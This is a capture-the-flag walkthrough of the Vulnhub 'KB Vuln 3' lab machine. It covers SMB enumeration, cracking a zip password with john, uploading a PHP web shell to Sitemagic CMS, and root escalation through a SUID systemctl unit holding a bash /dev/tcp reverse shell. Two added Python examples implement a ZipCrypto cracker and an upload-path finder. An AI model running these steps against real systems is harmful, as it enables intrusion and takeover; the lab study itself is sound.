Vulnhub: KB Vuln 3 target machine, detailed walkthrough

Published 2023-04-12 09:51:11  Author: Jason_huawen

KB Vuln 3

Author: jason huawen

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:69:ef:ae      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:38:ea:a0      1      60  PCS Systemtechnik GmbH          

netdiscover on Kali Linux identifies the target as 192.168.56.254; 192.168.56.1 and 192.168.56.100 are the host-only adapter and VirtualBox's DHCP server, so they are not targets.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-11 19:35 EDT
Nmap scan report for bogon (192.168.56.254)
Host is up (0.00042s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cb04f0363f42f73ace2ff54ce0abfe17 (RSA)
|   256 6106df25d5e1e347fe1394fd740c8500 (ECDSA)
|_  256 5089b6b43a0b6e63121040e2c4f93533 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:38:EA:A0 (Oracle VirtualBox virtual NIC)
Service Info: Host: KB-SERVER; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KB-SERVER, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time: 
|   date: 2023-04-11T23:35:58
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: kb-server
|   NetBIOS computer name: KB-SERVER\x00
|   Domain name: \x00
|   FQDN: kb-server
|_  System time: 2023-04-11T23:35:58+00:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds

The Nmap scan shows four open ports: 22 (OpenSSH 7.6p1), 80 (Apache 2.4.29) and 139/445 (Samba 4.7.6). The SMB host scripts already give a useful hint: the guest account was usable (account_used: guest) and message signing is not required, so anonymous enumeration of the shares is worth trying first.

Getting a shell

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ smbclient -L 192.168.56.254                                
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        Files           Disk      HACK ME
        IPC$            IPC       IPC Service (Samba 4.7.6-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            KB-SERVER
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ smbclient //192.168.56.254/Files        
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Oct  2 14:11:49 2020
  ..                                  D        0  Fri Oct  2 13:12:00 2020
  website.zip                         N 38936127  Fri Oct  2 14:11:41 2020

                14380040 blocks of size 1024. 9540188 blocks available
smb: \> get website.zip 
getting file \website.zip of size 38936127 as website.zip (121094.1 KiloBytes/sec) (average 121094.1 KiloBytes/sec)
smb: \> pwd
Current directory is \\192.168.56.254\Files\
smb: \> cd /var
cd \var\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> quit

smbclient connects to the target's SMB service with a null session (empty password). The Files share (comment "HACK ME") is readable anonymously, and website.zip is downloaded to Kali. Note that the share is its own root: cd /var fails with NT_STATUS_OBJECT_NAME_NOT_FOUND because paths are resolved inside the share, not on the server's filesystem.

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ enum4linux 192.168.56.254
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                  
                                                                                                                             
S-1-22-1-1000 Unix User\heisenberg (Local User)         

enum4linux enumerates local Unix accounts through the S-1-22-1 SID range and finds the user heisenberg (UID 1000).

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ ls -alh
total 38M
drwxr-xr-x  2 kali kali 4.0K Apr 11 19:38 .
drwxr-xr-x 89 kali kali 4.0K Apr 11 19:34 ..
-rw-r--r--  1 root root 1.8K Apr 11 19:35 nmap_full_scan
-rw-r--r--  1 kali kali  38M Apr 11 19:38 website.zip
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ unzip website.zip 
Archive:  website.zip
[website.zip] README.txt password:                                                                                                                              

website.zip is password-protected. zip2john extracts the archive's encryption metadata into a hash that John the Ripper can attack offline against a wordlist (rockyou.txt here):

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ zip2john website.zip > hashes
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes --force
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porchman         (website.zip)     
1g 0:00:00:00 DONE (2023-04-11 19:40) 1.886g/s 8617Kp/s 8617Kc/s 8617KC/s porno852..poppy670
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
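John reports the PKZIP format and cracks the archive in well under a second at several million candidates per second. That speed is a property of the legacy ZipCrypto scheme, not of the wordlist: each candidate password costs a few dozen key-schedule operations and is rejected by a single check byte almost every time. The following is an added example, not code from the original write-up or from any of the tools it uses. It reimplements ZipCrypto (PKWARE "traditional" encryption) so that an encrypted entry can be constructed entirely in memory (the README text from this machine, encrypted with the password john found, and a six-word stand-in for rockyou.txt, all constructed here), then cracks it the way zip2john + john do: a one-byte check on the 12-byte encryption header, followed by a full CRC-32 on the rare survivor.

```python
"""Dictionary attack on a ZipCrypto (traditional PKWARE) encrypted zip entry.

Added example, not part of the original write-up. The stream cipher below is
the one specified in the PKWARE APPNOTE; the archive is constructed in memory
so the attack runs offline without any zip file on disk.
"""
from __future__ import annotations

import os
import zlib

# Standard reflected CRC-32 table (polynomial 0xEDB88320); ZipCrypto uses it
# for its key updates as well as for the entry checksum.
_CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


def _crc32_update(crc: int, byte: int) -> int:
    return _CRC_TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)


class ZipCrypto:
    """PKWARE traditional encryption keystream (APPNOTE section 6.1)."""

    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:            # the whole key schedule is the password
            self._update(b)

    def _update(self, plain_byte: int) -> None:
        self.k0 = _crc32_update(self.k0, plain_byte)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_update(self.k2, self.k1 >> 24)

    def _stream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            out.append(p ^ self._stream_byte())
            self._update(p)           # keys advance on the plaintext byte
        return bytes(out)

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self._stream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


def encrypt_entry(plaintext: bytes, password: bytes) -> tuple[bytes, int]:
    """Return (encrypted payload, stored CRC-32) for one STORED zip entry.

    Real archives prepend 11 random bytes plus a check byte (the high byte of
    the entry's CRC-32) and encrypt that 12-byte header together with the data.
    """
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    header = os.urandom(11) + bytes([crc >> 24])
    return ZipCrypto(password).encrypt(header + plaintext), crc


def try_password(payload: bytes, stored_crc: int, password: bytes) -> bytes | None:
    """Fast-reject on the header check byte, then confirm with the full CRC."""
    zc = ZipCrypto(password)
    header = zc.decrypt(payload[:12])
    if header[11] != stored_crc >> 24:       # 255 of 256 wrong guesses stop here
        return None
    body = zc.decrypt(payload[12:])
    if zlib.crc32(body) & 0xFFFFFFFF != stored_crc:
        return None                           # passed the 1-byte check by chance
    return body


def crack(payload: bytes, stored_crc: int, wordlist) -> str | None:
    """Return the first wordlist entry that decrypts the payload, or None."""
    for word in wordlist:
        if try_password(payload, stored_crc, word.encode()) is not None:
            return word
    return None


# Constructed sample: the README text from this machine, encrypted with the
# password john recovered, plus a tiny stand-in for rockyou.txt.
SAMPLE_PLAINTEXT = b"Hi Heisenberg! Your website is activated. --> kb.vuln\n"
SAMPLE_PAYLOAD, SAMPLE_CRC = encrypt_entry(SAMPLE_PLAINTEXT, b"porchman")
SAMPLE_WORDLIST = ["123456", "password", "porno852", "poppy670", "porchman", "heisenberg"]

if __name__ == "__main__":
    print("password:", crack(SAMPLE_PAYLOAD, SAMPLE_CRC, SAMPLE_WORDLIST))
```

The check byte is what makes ZipCrypto cheap to attack: a wrong password needs only the password-length key schedule plus 12 decrypted bytes before it is discarded, and the CRC-32 confirmation runs on roughly one candidate in 256. Archives created with AES (WinZip AE-2, 7-Zip) do not have this property; zip2john still produces a hash for them, but john then needs a PBKDF2 derivation per candidate and the rate drops by orders of magnitude.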

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ cat README.txt     
Hi Heisenberg! Your website is activated. --> kb.vuln
Username  : admin
Password  : jesse
Have a good day !

These look like credentials for the website, and the README also names a hostname, kb.vuln. Set the credentials aside for now and look at the web server.

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ nikto -h http://192.168.56.254     
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-04-11 19:44:48 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2240, size: 5b0b40b8dd680, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-04-11 19:45:44 (GMT-4) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto finds nothing beyond missing headers and an outdated Apache, and the bare IP serves an untitled page. Going by README.txt the site is likely served as a virtual host for kb.vuln, so add that name to /etc/hosts:

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ sudo vim /etc/hosts                                        
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ cat /etc/hosts            
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254 kb.vuln


Reloading http://kb.vuln/ now returns the site instead of "page not found". It has a Login link, and the admin / jesse credentials from README.txt work. The site is Sitemagic CMS (website.zip unpacked into a sitemagic directory, and the web root on the target is /var/www/html/sitemagic). The next step is to upload shell.php through the CMS. The upload places no restriction on file type, but where does the file land on disk?

The page source answers that:

<div class="SMPagesTableCell" ><img style="border-radius: 5px; box-shadow: 0px 0px 7px -1px #333;" title="/Sunrise2/People.jpg" src="files/images/Sunrise2/People.jpg" alt="/Sunrise2/People.jpg" width="545" height="270"></div>

so uploaded media is served from:

files/images/

After uploading shell.php into the images/backgrounds folder, it is reachable at:

http://kb.vuln/files/images/backgrounds/shell.php

Start a listener on Kali first (port 5555 below), then request that URL. The first lines the listener receives show that shell.php ran uname -a, w and id before handing over /bin/sh; python is then used to spawn a proper bash pty:
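Reading one <img> tag by eye worked here, but on a larger site it is quicker to pull every asset URL out of the page source and try each directory in turn. The following is an added example, not code from the original write-up or from Sitemagic: it collects src/href attributes from a page, drops external and non-file links, and lists the site-relative directories deepest-first so each can be checked for the uploaded file. The sample page is constructed for the example (the write-up's <img> tag plus a few typical CMS references); the hostname kb.vuln and the filename shell.php come from the write-up.

```python
"""Find where a CMS serves uploaded files by harvesting asset URLs from page source.

Added example, not part of the original write-up. Feed it the HTML of any
page on the site; it returns candidate directories and the URLs at which an
unrestricted upload named shell.php would be reachable.
"""
from __future__ import annotations

from html.parser import HTMLParser
from posixpath import dirname
from urllib.parse import urljoin, urlparse

# Tag -> attribute that carries a file location.
_URL_ATTRS = {"img": "src", "script": "src", "link": "href", "a": "href", "source": "src"}


class _AssetCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.urls: list[str] = []

    def handle_starttag(self, tag, attrs):
        want = _URL_ATTRS.get(tag)
        if want is None:
            return
        for name, value in attrs:
            if name == want and value:
                self.urls.append(value)


def asset_dirs(html: str, base: str = "/") -> list[str]:
    """Site-relative directories (no leading slash) that serve files referenced by the page.

    `base` is the path of the page the HTML came from, so relative links
    (./, ../) resolve correctly. External URLs, #anchors and mailto: links
    are dropped; the result is de-duplicated and ordered deepest-first.
    """
    collector = _AssetCollector()
    collector.feed(html)
    dirs: set[str] = set()
    for u in collector.urls:
        parsed = urlparse(u)
        if parsed.scheme or parsed.netloc or u.startswith("#"):
            continue
        path = urlparse(urljoin(base, u)).path
        d = dirname(path).lstrip("/")
        if d:
            dirs.add(d)
    return sorted(dirs, key=lambda d: (-d.count("/"), d))


def candidate_urls(host: str, dirs, filename: str = "shell.php") -> list[str]:
    """URLs at which an unrestricted upload named `filename` might be served."""
    return [f"http://{host}/{d}/{filename}" for d in dirs]


# Constructed sample page: the <img> from the write-up plus typical CMS references.
SAMPLE_HTML = """
<html><head>
<link rel="stylesheet" href="templates/Sunrise/style.css">
<script src="https://cdn.example.net/jquery.js"></script>
</head><body>
<a href="#top">top</a>
<a href="mailto:admin@kb.vuln">contact</a>
<div class="SMPagesTableCell"><img title="/Sunrise2/People.jpg"
  src="files/images/Sunrise2/People.jpg" alt="/Sunrise2/People.jpg"></div>
<img src="files/images/backgrounds/sky.jpg">
</body></html>
"""

if __name__ == "__main__":
    for url in candidate_urls("kb.vuln", asset_dirs(SAMPLE_HTML, base="/index.php")):
        print(url)
```

Deepest-first ordering is deliberate: media managers usually write into the most specific existing folder (files/images/backgrounds here), and a hit there also confirms the shallower prefixes without extra requests.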

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ sudo nc -nlvp 5555                                         
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 38966
Linux kb-server 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 00:04:41 up 34 min,  0 users,  load average: 0.86, 0.42, 0.55
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@kb-server:/$ cd /home
cd /home
www-data@kb-server:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root       root       4.0K Oct  2  2020 .
drwxr-xr-x 24 root       root       4.0K Oct  2  2020 ..
drwxr-xr-x  4 heisenberg heisenberg 4.0K Oct  2  2020 heisenberg
www-data@kb-server:/home$ cd heisengerg
cd heisengerg
bash: cd: heisengerg: No such file or directory
www-data@kb-server:/home$ cd heisenberg
cd heisenberg
www-data@kb-server:/home/heisenberg$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 heisenberg heisenberg 4.0K Oct  2  2020 .
drwxr-xr-x 3 root       root       4.0K Oct  2  2020 ..
-rw-r--r-- 1 heisenberg heisenberg  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 heisenberg heisenberg 3.7K Apr  4  2018 .bashrc
drwx------ 2 heisenberg heisenberg 4.0K Oct  2  2020 .cache
drwx------ 3 heisenberg heisenberg 4.0K Oct  2  2020 .gnupg
-rw-r--r-- 1 heisenberg heisenberg  807 Apr  4  2018 .profile
-rw-r--r-- 1 heisenberg heisenberg    0 Oct  2  2020 .sudo_as_admin_successful
-rw-r--r-- 1 root       root         33 Oct  2  2020 user.txt
www-data@kb-server:/home/heisenberg$ cat user.txt
cat user.txt
6346c6d19751f1a3195f1e4b4b609544
www-data@kb-server:/home/heisenberg$ 

That gives the user flag.

Privilege escalation

www-data@kb-server:/var/www/html/sitemagic$ find / -perm -4000 -type f 2>/dev/null
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/at
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/bin/systemctl
/bin/umount
/bin/su
/bin/mount
/bin/fusermount
/bin/ping

/bin/systemctl carries the SUID bit. Because it runs as root, any unit it links and starts is executed by systemd as root, so a unit file under the attacker's control is enough. GTFOBins documents the steps below; its first line (sudo install -m =xs $(which systemctl) .) only creates a SUID copy for a lab and is not needed here, since /bin/systemctl is already SUID and can be used directly:

sudo install -m =xs $(which systemctl) .

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

So write a service file whose ExecStart spawns a second reverse shell. It connects back to port 6666, so a second listener (nc -nlvp 6666) must be running on Kali before the unit is started:

┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ cat shell.service   
[Service]
Type=oneshot
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.206/6666 0>&1'

[Install]
WantedBy=multi-user.target

Serve shell.service from Kali on port 8000 (for example with python3 -m http.server 8000 in the directory holding it) and download it into /tmp on the target:

www-data@kb-server:/tmp$ wget http://192.168.56.206:8000/shell.service
wget http://192.168.56.206:8000/shell.service
--2023-04-12 00:31:31--  http://192.168.56.206:8000/shell.service
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 132 [application/octet-stream]
Saving to: 'shell.service'

shell.service       100%[===================>]     132  --.-KB/s    in 0s      

2023-04-12 00:31:31 (46.4 MB/s) - 'shell.service' saved [132/132]


Move shell.service into the web root (systemctl link requires an absolute path to the unit file, which is why the full path is given below):

www-data@kb-server:/var/www/html/sitemagic$ mv /tmp/shell.service .
mv /tmp/shell.service .

Then link the unit:

www-data@kb-server:/var/www/html/sitemagic$ systemctl link /var/www/html/sitemagic/shell.service

and start it. Because systemctl runs as root through its SUID bit, systemd executes ExecStart as root, and the listener on port 6666 should receive a root shell:

www-data@kb-server:/var/www/html/sitemagic$ systemctl start shell.service